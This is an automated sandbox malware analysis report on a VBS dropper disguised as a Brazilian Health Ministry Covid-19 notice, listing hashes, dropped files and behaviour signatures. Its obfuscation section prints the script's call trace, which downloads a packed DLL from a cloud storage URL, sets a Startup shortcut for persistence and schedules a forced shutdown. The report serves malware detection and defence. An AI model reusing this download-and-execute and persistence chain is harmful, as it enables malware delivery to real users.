Analysis Report Comuinicado-Covid19-Min-Saude-CGC-29-01-21-136.vbs

ID:	348031
Product:	CloudBasic
Start time:	16:13:42
Start date:	03.02.2021
Sample:	Comuinicado-Covid19-Min-Saude-CGC-29-01-21-136.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	a7eaefeac82a762678b254c38f72a5a0
SHA1:	972982331616263fcb28fab209b150c6365068d7
SHA256:	7f3cd558f1963d4edf18c46b39a45ffc3d83257bd82ecf80e87e10c4cb1efba1
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-4-17[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	63FF05C279EDE90B6A7A09DA944B7003	62E4CB3BF6EE51CB6746BB717E04F60A1E3125D4	6A3A36AF2FB89D913230D0F58BD4C7E6DC9AF5C25A3280B6CA2B920E8A3954A2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0[1].zip	Zip archive data, at least v2.0 to extract	F6F9C197DE97000E33113089993889A8	9EF214E6077BAF24057AE37DC971C4D80DB983C4	88643A7FC5653791841207C713EA290A1D0A0264B37A7D3B031815E52211BB09
C:\Users\user\AppData\Roaming\0.zip	Zip archive data, at least v2.0 to extract	F6F9C197DE97000E33113089993889A8	9EF214E6077BAF24057AE37DC971C4D80DB983C4	88643A7FC5653791841207C713EA290A1D0A0264B37A7D3B031815E52211BB09
C:\Users\user\AppData\Roaming\76941835522651\uwnxheepqiputvsut3285467922686.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	63FF05C279EDE90B6A7A09DA944B7003	62E4CB3BF6EE51CB6746BB717E04F60A1E3125D4	6A3A36AF2FB89D913230D0F58BD4C7E6DC9AF5C25A3280B6CA2B920E8A3954A2
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsjfpdeuwh .lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide	31AFED11275408F1624DAD76322C3B74	B76FA61D3D7BD1750BF2734456AC9B9745502A3B	583C71233DFAE3B6EECD318AB9B7C1BD6B04C22D0B8B7D9B7A1E208360E40607
C:\Users\user\AppData\Roaming\uwqybklmrhw.vbs	ASCII text, with CRLF line terminators	A1000881510D29420706AEFDB24B4757	0FA2A4C6B638DE6803EF07E0071C8DB33BB7176B	3B7054F735A4D2B12D0D3759512AF9A642DADC093F21BD839723552552259E48

AV Detection:

Multi AV Scanner detection for submitted file

Source: Comuinicado-Covid19-Min-Saude-CGC-29-01-21-136.vbs

Virustotal: Detection: 25%

Perma Link

Networking:

Potential malicious VBS script found (has network functionality)

Source:	Initial file: .write TMLZSYWALNTVQGJRIS.responseBody
Source:	Initial file: .savetofile ZMNNTJFZFZPMFFJJGZ, 2
Source:	Initial file: .write EQMZPDJEPZWCUYLROL.responseBody
Source:	Initial file: .savetofile PMEOGLBUDQNCTSPSVQ, 2

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox View	IP Address: 8.8.8.8 8.8.8.8

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GOOGLEUS GOOGLEUS

Urls found in memory or binary data

Source: wscript.exe	String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip
Source: wscript.exe	String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-4-17.dll

System Summary:

Detected VMProtect packer

Source: P-4-17[1].dll.0.dr

Static PE information: .vmp0 and .vmp1 section names

Abnormal high CPU Usage

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 98%

Java / VBScript file with very long strings (likely obfuscated code)

Source: Comuinicado-Covid19-Min-Saude-CGC-29-01-21-136.vbs

Initial sample: Strings found which are bigger than 50

PE file contains more sections than normal

Source: P-4-17[1].dll.0.dr

Static PE information: Number of sections : 13 > 10

Classification label

Source: classification engine

Classification label: mal88.evad.winVBS@1/6@0/2

Creates files inside the user directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\uwqybklmrhw.vbs

Jump to behavior

Executes visual basic scripts

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Comuinicado-Covid19-Min-Saude-CGC-29-01-21-136.vbs'

Reads ini files

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Comuinicado-Covid19-Min-Saude-CGC-29-01-21-136.vbs

Virustotal: Detection: 25%

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\uwqybklmrhw.vbs", "true");ITextStream.Write("Set MHSXIMOJBNEVEHMHPM = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\76941835522651");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-4-17.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\76941835522651\uwnxheepqiputvsut3285467922686.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsjfpdeuwh .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\76941835522651\uwnxheepqiputvsut3285467922686.dll mJ8Lf9v0GZnptOVNb2I");IWshShortcut.WindowStyle("1");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsjfpdeuwh");IWshShortcut.Save();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Roaming\uwqybklmrhw.vbs");ITextStream.ReadAll();ITextStream.Close();IHost.Sleep("300000");ISWbemServicesEx.ExecQuery("select * from Win32_OperatingSystem where Primary=true");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01000001("6")

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

PE file contains sections with non-standard names

Source: P-4-17[1].dll.0.dr	Static PE information: section name: .didata
Source: P-4-17[1].dll.0.dr	Static PE information: section name: .vmp0
Source: P-4-17[1].dll.0.dr	Static PE information: section name: .vmp1

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\uwqybklmrhw.vbs

Jump to behavior

Drops PE files

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\76941835522651\uwnxheepqiputvsut3285467922686.dll			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-4-17[1].dll			Jump to dropped file

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsjfpdeuwh .lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsjfpdeuwh .lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Potential evasive VBS script found (sleep loop)

Source: Initial file	Initial file: WQSJXTVOJHEDXTCPRI.Write "WScript.Sleep(300000)" & vbCrLf
Source: C:\Windows\System32\wscript.exe	Dropped file: WScript.Sleep(300000)			Jump to dropped file

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\76941835522651\uwnxheepqiputvsut3285467922686.dll			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-4-17[1].dll			Jump to dropped file

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: P-4-17[1].dll.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 172.217.23.16 187

Jump to behavior

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior